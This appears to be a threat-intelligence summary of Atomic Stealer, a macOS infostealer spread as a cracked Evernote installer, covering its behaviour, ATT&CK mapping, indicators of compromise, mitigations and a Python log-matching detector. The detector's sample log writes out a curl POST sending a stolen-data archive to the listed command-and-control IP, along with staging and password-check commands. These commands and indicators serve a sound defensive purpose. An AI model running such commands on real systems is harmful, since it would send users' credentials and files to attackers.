Full Report
AhnLab SEcurity intelligence Center (ASEC) has discovered the Atomic Stealer malware being distributed disguised as the Evernote Crack program. Atomic Stealer is an information-stealing malware for macOS. It steals data such as browser information, system keychain, wallet, and system information. It is mainly distributed through installation files such as pkg and dmg. When users […]
Analysis Summary
# Tool/Technique: Atomic Stealer
## Overview
Atomic Stealer is an information-stealing malware specifically targeting macOS systems. It is being distributed by threat actors disguised as legitimate software, in this case, an "Evernote Crack program," often redirected to via compromised Google ads or malicious download sites. Its primary purpose is to harvest sensitive data from the victim's machine.
## Technical Details
- Type: Malware family
- Platform: macOS
- Capabilities: Steals browser information, system keychain data, cryptocurrency wallet credentials, and general system information. Employs anti-VM checks.
- First Seen: Not explicitly stated, but recently analyzed by ASEC.
## MITRE ATT&CK Mapping
This analysis maps several observed behaviors:
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
    - Observed as the payload being disguised as crack software and delivered inside installation packages (pkg, dmg).
  - T1497 - Virtualization/Sandbox Evasion
    - T1497.001 - Virtual Check
    - Checks for "QEMU" or "VMware" strings in system metadata.
- **TA0009 - Collection**
  - T1005 - Data from Local System
    - Collects browser data, system info, Notes, keychains, Telegram, and crypto wallets.
  - T1119 - Automated Collection
    - Invokes `system_profiler` with the `SPMemoryDataType` data type.
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol
    - T1071.001 - Web Protocols (HTTP POST requests issued via `curl`).
## Functionality
### Core Capabilities
- **File Collection:** Explores and collects target files (browsers, keychains, wallets, Notes, Telegram) using AppleScript executed via OSA Script.
- **Data Staging:** Compresses collected data into a file named `out.zip` in the `/tmp` directory using the `ditto` command.
- **Exfiltration:** Sends the compressed data to a threat actor server via a POST request using the `curl` command.
- **Self-Deletion:** Removes the malware artifact after successful exfiltration.
### Advanced Features
- **Environment Evasion:** Actively checks for signs of virtual environments (QEMU, VMware) using system diagnostics (`system_profiler`).
- **Credential Harvesting:** Deceptively prompts the user for their system password under the guise of a legitimate program warning, validating it using `dscl . authonly` and storing it.
- **Initial Execution Bypass (macOS):** On some distribution sites, the user is required to run a downloaded shell script (`install.sh`) from the terminal first, most likely to preempt or bypass macOS Gatekeeper warnings.
- **Platform Biasing:** The distribution site checks the UserAgent: macOS users are directed to Atomic Stealer, while Windows users are redirected to LummaC2 malware installation pages.
## Indicators of Compromise
- File Hashes:
- MD5: `774d14a4fc61176aaefb94468b513289`, `bf9b98fce3c2fefdacdff234837e621b`, `e0030c7976f1d90fd38e4e898e9957e8`
- File Names: `out.zip` (staged archive)
- Registry Keys: Not applicable (focus is macOS)
- Network Indicators:
- `http://192[.]124[.]178[.]88/contact`
- `https://webzal[.]com/get/update`
- Behavioral Indicators: Execution of `system_profiler`, use of `dscl . authonly`, execution of AppleScript via OSA Script, creation of directories and files in `/tmp`, and outbound POST requests via `curl`.
## Associated Threat Actors
The article does not explicitly name the threat actor group using Atomic Stealer in this campaign, but it notes the distribution utilizes tactics often employed by financially motivated cybercriminals targeting macOS users (e.g., software cracks, Google ad redirection).
## Detection Methods
- Signature-based detection: Match the file hashes and network indicators listed above.
- Behavioral detection: Monitor for processes using `dscl . authonly` to authenticate user credentials, execution of `system_profiler` followed by file compression in `/tmp`, and outbound connections initiated by unexpected processes using `curl` to exfiltrate data.
- YARA rules: Not provided in the text.
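The following is an added example, not code from the ASEC report: it turns the Indicators of Compromise and the behavioural detection bullets above into a small matcher that runs over a constructed process-event log. The log format (JSON lines with `ts`, `pid`, `ppid`, `cmdline`, and optional `md5` / `dest_url` fields) is an assumption standing in for whatever an EDR export provides; the hashes and URLs are the ones listed on this page, and the sample events are constructed to exercise each indicator plus two benign cases.

```python
"""Behavioural + IoC matching for the Atomic Stealer chain described above.

Added example; assumes a hypothetical JSON-lines process-event export with the
fields ts, pid, ppid, cmdline and optionally md5 and dest_url.
"""
import json
import re
from collections import defaultdict

# File hashes and C2 URLs as listed in the Indicators of Compromise section.
IOC_MD5 = {
    "774d14a4fc61176aaefb94468b513289",
    "bf9b98fce3c2fefdacdff234837e621b",
    "e0030c7976f1d90fd38e4e898e9957e8",
}
IOC_URLS_DEFANGED = [
    "http://192[.]124[.]178[.]88/contact",
    "https://webzal[.]com/get/update",
]


def refang(ioc: str) -> str:
    """Turn the defanged '[.]' back into '.' so IoCs compare against real URLs."""
    return ioc.replace("[.]", ".")


IOC_URLS = {refang(u) for u in IOC_URLS_DEFANGED}

# Behavioural indicators named in the Detection Methods section.
RE_DSCL_AUTHONLY = re.compile(r"\bdscl\s+\.\s+authonly\b")
RE_SYSTEM_PROFILER = re.compile(r"\bsystem_profiler\b")
RE_DITTO_TMP = re.compile(r"\bditto\b.*\s/tmp/\S+\.zip")
RE_OSASCRIPT = re.compile(r"\bosascript\b")
RE_CURL_POST = re.compile(r"\bcurl\b.*(-X\s*POST|--data|-d\s|-F\s|--form)")


def parse_events(text: str):
    """Parse JSON-lines into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze(events):
    """Group events by parent pid and evaluate indicators per parent.

    Returns {ppid: sorted list of finding names}. The 'system_profiler then
    /tmp archive' finding requires the ordering the report describes.
    """
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)

    findings = {}
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e["ts"])
        hits = set()
        profiler_seen = False
        for ev in evs:
            cmd = ev.get("cmdline", "")
            if ev.get("md5") in IOC_MD5:
                hits.add("ioc_md5_match")
            if ev.get("dest_url") in IOC_URLS:
                hits.add("ioc_c2_url_match")
            if RE_DSCL_AUTHONLY.search(cmd):
                hits.add("password_validation_dscl_authonly")
            if RE_OSASCRIPT.search(cmd):
                hits.add("applescript_collection")
            if RE_SYSTEM_PROFILER.search(cmd):
                profiler_seen = True
            if profiler_seen and RE_DITTO_TMP.search(cmd):
                hits.add("system_profiler_then_tmp_archive")
            if RE_CURL_POST.search(cmd):
                hits.add("curl_post_exfil")
        if hits:
            findings[ppid] = sorted(hits)
    return findings


def triage(findings, min_behaviours=3):
    """Flag a parent on any IoC match, or on >= min_behaviours behavioural hits.

    Returns {ppid: 'ioc' | 'behavioural'}; a lone osascript or system_profiler
    (both common on a healthy Mac) is deliberately not enough on its own.
    """
    flagged = {}
    for ppid, hits in findings.items():
        ioc = [h for h in hits if h.startswith("ioc_")]
        behav = [h for h in hits if not h.startswith("ioc_")]
        if ioc or len(behav) >= min_behaviours:
            flagged[ppid] = "ioc" if ioc else "behavioural"
    return flagged


# Constructed sample log: ppid 501 is the malicious chain, 600/700/800 are benign.
SAMPLE_LOG = """
{"ts": 1, "pid": 501, "ppid": 500, "cmdline": "/bin/sh install.sh", "md5": "774d14a4fc61176aaefb94468b513289"}
{"ts": 2, "pid": 502, "ppid": 501, "cmdline": "system_profiler SPMemoryDataType"}
{"ts": 3, "pid": 503, "ppid": 501, "cmdline": "osascript -e 'set docs to path to documents folder'"}
{"ts": 4, "pid": 504, "ppid": 501, "cmdline": "dscl . authonly jdoe <redacted>"}
{"ts": 5, "pid": 505, "ppid": 501, "cmdline": "ditto -c -k --sequesterRsrc /tmp/collected /tmp/out.zip"}
{"ts": 6, "pid": 506, "ppid": 501, "cmdline": "curl -X POST -F file=@/tmp/out.zip http://192.124.178.88/contact", "dest_url": "http://192.124.178.88/contact"}
{"ts": 7, "pid": 601, "ppid": 600, "cmdline": "curl https://example.com/index.html"}
{"ts": 8, "pid": 701, "ppid": 700, "cmdline": "system_profiler SPHardwareDataType"}
{"ts": 9, "pid": 801, "ppid": 800, "cmdline": "osascript -e 'display dialog \\"backup done\\"'"}
"""


if __name__ == "__main__":
    found = analyze(parse_events(SAMPLE_LOG))
    for ppid, hits in sorted(found.items()):
        print(ppid, hits)
    print("flagged:", triage(found))
```

The ordering requirement in `analyze` mirrors the report's "`system_profiler` followed by file compression in `/tmp`" wording, and `triage` keeps single legitimate uses of `osascript` or `system_profiler` from paging anyone; tune `min_behaviours` and the regexes to the command-line shapes your own telemetry produces.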
## Mitigation Strategies
- Do not execute scripts or install software downloaded from untrusted sources or third-party sites, especially those offered as "cracks" or free versions of paid software.
- Keep macOS Gatekeeper and XProtect security features fully enabled and configured for maximum security.
- Users should be highly cautious when prompted for their system password outside of expected system update or application installation dialogues.
- Review security policies to restrict execution of shell scripts downloaded from the internet.
## Related Tools/Techniques
- **LummaC2:** Malware noted to be distributed to Windows users from the same distribution site structure, indicating a campaign targeting multiple operating systems simultaneously.